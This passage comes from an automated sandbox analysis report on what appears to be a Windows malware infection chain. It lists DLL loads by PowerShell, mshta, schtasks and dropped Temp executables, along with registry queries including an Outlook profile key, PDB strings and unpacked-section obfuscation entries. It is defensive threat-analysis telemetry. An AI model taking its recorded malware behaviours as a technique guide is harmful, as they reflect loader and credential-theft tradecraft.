                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: webio.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: schannel.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ntasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ncrypt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: msasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: gpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: dpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: amsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: webio.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: schannel.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ntasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ncrypt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: msasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: gpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: dpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: amsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                                    Source: Google Drive.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: YouTube.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Sheets.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Gmail.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Slides.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Docs.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                    Source: EdYEXasNiR.exeStatic file information: File size 1857024 > 1048576
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcr90.dll
                                    Source: EdYEXasNiR.exeStatic PE information: Raw size of ulqubmxb is bigger than: 0x100000 < 0x19b800
                                    Source: Binary string: mozglue.pdbP source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: nss3.pdb@ source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                    Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, cbfb8a9c89.exe, 0000001D.00000000.2226147614.0000000000C32000.00000002.00000001.01000000.00000011.sdmp
                                    Source: Binary string: nss3.pdb source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                    Source: Binary string: mozglue.pdb source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: 696689ce6d.exe, 0000002F.00000003.4293663574.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000000.2339203126.0000000000F7C000.00000002.00000001.01000000.00000016.sdmp, 696689ce6d.exe, 0000002F.00000002.4903441825.0000000000F7C000.00000002.00000001.01000000.00000016.sdmp

                                    Data Obfuscation

                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeUnpacked PE file: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W;losjkhko:EW;ybfttvsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;losjkhko:EW;ybfttvsi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeUnpacked PE file: 5.2.456YTTQ213T2RO9QAEYSNNZDL.exe.e70000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
